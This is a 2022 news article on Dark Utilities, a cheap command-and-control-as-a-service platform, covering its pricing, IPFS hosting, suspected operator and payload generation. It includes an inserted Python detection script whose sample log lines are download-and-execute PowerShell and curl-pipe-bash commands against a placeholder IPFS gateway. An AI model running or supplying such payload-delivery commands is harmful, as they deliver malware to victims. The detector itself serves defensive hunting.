C2-as-a-Service Portal Dark Utilities Now Boasts Over 3,000 Criminal Subscribers

Dark Utilities C2aaS enables remote access, command execution, distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations.

September 13, 2022

Dark Utilities C2-as-a-Service, C2aaS

Security researchers at Cisco Talos discovered a new tool dubbed Dark Utilities that offers command and control (C2) as a service (C2aaS) infrastructure for hackers who want a quick and easy way to support their malicious operations.

Released in early 2022, Dark Utilities currently has around 3,000 users enrolled, according to the latest data by security analytics and operations management company Securonix. The tool provides services for remote access, command execution, distributed denial-of-service (DDoS) attacks, and cryptocurrency mining operations.

Securonix termed Dark Utilities “a C2 platform that provides adversaries with full-featured capabilities.” It supports payloads for Windows, Linux, macOS, Android, and Python-based implementations, so adversaries can work on whichever platform they are comfortable with.

Dark Utilities is the brainchild of a relatively unknown actor in cybercrime who goes by the moniker Inplex-sys. Cisco Talos assessed them to be a French speaker who also converses in English. Inplex-sys limited their activities to Telegram and Discord before releasing Dark Utilities.

Inplex-sys could have ties to the Lapsus$ cyber extortion group that victimized Samsung, NVIDIA, Ubisoft, Okta, Globant, and others. Talos discovered an inplex-sys record on Doxbin, a doxing site once owned and managed by the now arrested 16-year-old member of Lapsus$. Inplex-sys records on Doxbin led Talos to believe they are either in Germany or France.

Dark Utilities leverages the Interplanetary File System (IPFS) instead of HTTP/HTTPS for peer-to-peer file sharing, which makes it harder for law enforcement to take down or otherwise interfere with. Like the Tor2Web network, IPFS is decentralized, gateway-driven, and doesn’t require an application installed on a computer to access its content distribution network (CDN).


A C2 server is one of the more essential components of hacking, malicious or otherwise. As the name suggests, it serves as a single point of control for targeted attacks using malware: it lets the propagators of the attack communicate with the victim system, send it commands and additional payloads, and store the data stolen from it.

Dark Utilities’ C2aaS offers all of this at a starting price of a meager €9.99. Dark Utilities is hosted on the Tor network as well as the open internet. “The dirt cheap subscription plan of the Dark Utilities would encourage more amateurs and script kiddies to enroll in the service and execute attacks without having ample knowledge of cyber attacks,” opined researchers at K7 Security.

“For instance, from the RaaS revenue model, anyone can figure out how remote attacks would multifold with the arrival of C2aaS. The RaaS services usually appoint affiliates and offer a cut of the ransom money. However, C2aaS would allow anyone to launch cyberattacks on any system without the necessary knowledge or resources.”

User authentication is done over Discord. Once authenticated, users are taken to a dashboard where they are prompted to generate new payloads for the OS of the machine they aim to compromise, and then deploy them through the same dashboard.

“Selecting an operating system causes the platform to generate a command string that threat actors are typically embedding into PowerShell or Bash scripts to facilitate the retrieval and execution of the payload on victim machines. An example of this for a payload targeting the Windows operating system is shown below,” Talos explained.
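The command shape Talos describes (a short PowerShell or Bash string that retrieves a payload, here from an IPFS gateway path, and executes it in the same line) is something a defender can hunt for in process-creation or script-block logs. The following is an added example, not code from the article, Talos or Securonix; the log lines, the gateway hostname and the CID placeholders are constructed, and the scoring rules are my own heuristics.

```python
import re
from dataclasses import dataclass

# Heuristics for the download-and-execute shape described in the article.
# An IPFS gateway path or ipfs:// URI in a command line is the distinguishing
# feature of the Dark Utilities case; fetch + exec in one line is the generic shape.
IPFS_PATH = re.compile(r"/ipfs/[A-Za-z0-9]{20,}|ipfs://[A-Za-z0-9]{20,}", re.I)
FETCH = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.I)
EXEC = re.compile(r"Invoke-Expression|\biex\b|\|\s*(?:ba)?sh\b|Start-Process|chmod\s+\+x", re.I)


@dataclass
class Finding:
    line_no: int
    reasons: list


def score_command(cmd: str) -> list:
    """Return the list of heuristic tags that match one command line."""
    reasons = []
    if IPFS_PATH.search(cmd):
        reasons.append("ipfs-gateway-path")
    if FETCH.search(cmd):
        reasons.append("remote-fetch")
    if EXEC.search(cmd):
        reasons.append("inline-exec")
    return reasons


def scan(lines) -> list:
    """Flag lines that both fetch remote content and execute it in the same command."""
    findings = []
    for i, line in enumerate(lines, 1):
        reasons = score_command(line)
        if "remote-fetch" in reasons and "inline-exec" in reasons:
            findings.append(Finding(i, reasons))
    return findings


# Constructed sample log lines (hostname and CIDs are placeholders, not real indicators).
SAMPLE_LOG = [
    'powershell.exe -c "IEX((New-Object Net.WebClient).DownloadString(\'https://gateway.example/ipfs/QmConstructedCidPlaceholder0000000\'))"',
    "curl -s https://gateway.example/ipfs/bafyConstructedCidPlaceholder00000 | bash",
    'powershell.exe -c "Invoke-WebRequest https://updates.example/patch.msi -OutFile C:\\Temp\\patch.msi"',
    'bash -c "echo hello"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {', '.join(f.reasons)}")
```

Lines 1 and 2 are flagged (with the IPFS tag), while the plain download on line 3 and the harmless shell on line 4 are not; tune the regexes to your own environment's baseline before alerting on them.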

Besides the mainstream operating systems, Dark Utilities also supports payload creation for FiveM and for the ARM64 and ARMV71 architectures, enabling attacks against embedded, internet-connected devices such as routers, phones, and internet-of-things (IoT) devices.

For payload and bot management, Dark Utilities has an administrative panel that lists all victim systems, letting users control their malicious operations from one place. The dashboard also surfaces several metrics, such as server health and platform statistics.

Dark Utilities C2aaS Dashboard | Source: Cisco Talos

The 71 indicators of compromise (IOCs) for Dark Utilities are available on the Securonix website.

Sumeet Wadhwani

Asst. Editor, Spiceworks Ziff Davis

An earnest copywriter at heart, Sumeet is what you'd call a jack of all trades, rather techs. A self-proclaimed 'half-engineer', he dropped out of Computer Engineering to answer his creative calling pertaining to all things digital. He now writes what techies engineer. As a technology editor and writer for News and Feature articles on Spiceworks (formerly Toolbox), Sumeet covers a broad range of topics from cybersecurity, cloud, AI, emerging tech innovation, hardware, semiconductors, et al. Sumeet compounds his geopolitical interests with cartophilia and antiquarianism, not to mention the economics of current world affairs. He bleeds Blue for Chelsea and Team India! To share quotes or your inputs for stories, please get in touch on sumeet_wadhwani@swzd.com